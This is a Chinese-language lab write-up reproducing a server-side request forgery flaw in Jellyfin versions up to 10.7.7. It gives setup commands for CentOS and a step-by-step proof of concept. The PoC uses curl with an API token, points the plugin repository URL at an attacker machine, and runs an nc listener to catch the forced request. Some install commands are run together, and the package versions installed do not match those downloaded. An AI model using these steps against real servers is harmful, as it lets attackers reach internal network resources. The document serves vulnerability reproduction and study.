漏洞描述：

Jellyfin 直到 v10.7.7 通过组件 /Repository 包含服务器端请求伪造 （SSRF）。此漏洞允许攻击者通过构建的 POST 请求访问网络资源和敏感信息。

环境及部署说明：

实验环境：Centos 7
试验机器IP地址：192.168.50.122:8096
攻击机器IP地址：192.168.50.254:2223
部署方式：

配置yum源

wget -O /etc/yum.repos.d/CentOS-Base.repo https://mirrors.aliyun.com/repo/Centos-7.reposed -i -e '/mirrors.cloud.aliyuncs.com/d' -e '/mirrors.aliyuncs.com/d' /etc/yum.repos.d/CentOS-Base.repowget -O /etc/yum.repos.d/epel.repo http://mirrors.aliyun.com/repo/epel-7.repo

配置rpmfusion源，安装ffmpeg

yum install epel-releasewget https://download1.rpmfusion.org/free/el/rpmfusion-free-release-7.noarch.rpmrpm -ihv rpmfusion-free-release-7.noarch.rpmyum install ffmpeg

下载jellyfin服务端相关rpm包

https://repo.jellyfin.org/archive/server/centos/stable/10.7.7/server/jellyfin-server-10.7.7-1.el7.x86_64.rpmhttps://repo.jellyfin.org/archive/server/centos/stable/10.7.7/server/jellyfin-10.7.7-1.el7.x86_64.rpmhttps://repo.jellyfin.org/archive/server/centos/stable/10.7.7/web/jellyfin-web-10.7.7-1.el7.noarch.rpm

yum本地安装jellyfin-server

yum localinstall jellyfin-web-10.6.4-1.el7.noarch.rpmyum localinstall jellyfin-server-10.6.4-1.el7.x86_64.rpmyum localinstall jellyfin-10.6.4-1.el7.x86_64.rpm 

启动jellyfin服务

systemctl enable jellyfin.servicesystemctl start jellyfin.servicenetstat -anp | grep 8096

测试过程

访问http://192.168.50.122:8096 测试地址，而后按照流程直接设置好后登录后台

漏洞位于插件模块(Repository )->存储库添加处，此处存在SSRF漏洞

首先，我们使用以下POC来获取系统本身的存储库：

curl -X GET "http://192.168.50.122:8096/Repositories" -H  "accept: application/json" -H  "x-emby-token: ea314abb3b444d769da3038c2afb8354"

输出如下：

[{"Name":"Jellyfin Stable","Url":"https://repo.jellyfin.org/releases/plugin/manifest-stable.json","Enabled":true}]

我们使用以下POC修改储存库

[{"Name":"Jellyfin Stable","Url":"http://192.168.50.254:2223/ssrf_test?param=1¶m2=3","Enabled":true}]

这时，我们再次获取仓库，输出如下：

[{"Name":"Jellyfin Stable","Url":"http://192.168.50.254:2223/ssrf_test?param=1\u0026param2=3","Enabled":true}]

我们此时发送如下请求，同时在192.168.50.254攻击机上开启2223监听端口

nc -lvvp 2223

curl -X GET "http://192.168.50.122:8096/Packages" -H  "accept: application/json" -H  "x-emby-token: ea314abb3b444d769da3038c2afb8354"

反回KALI攻击机，发现此时已经成功监听到请求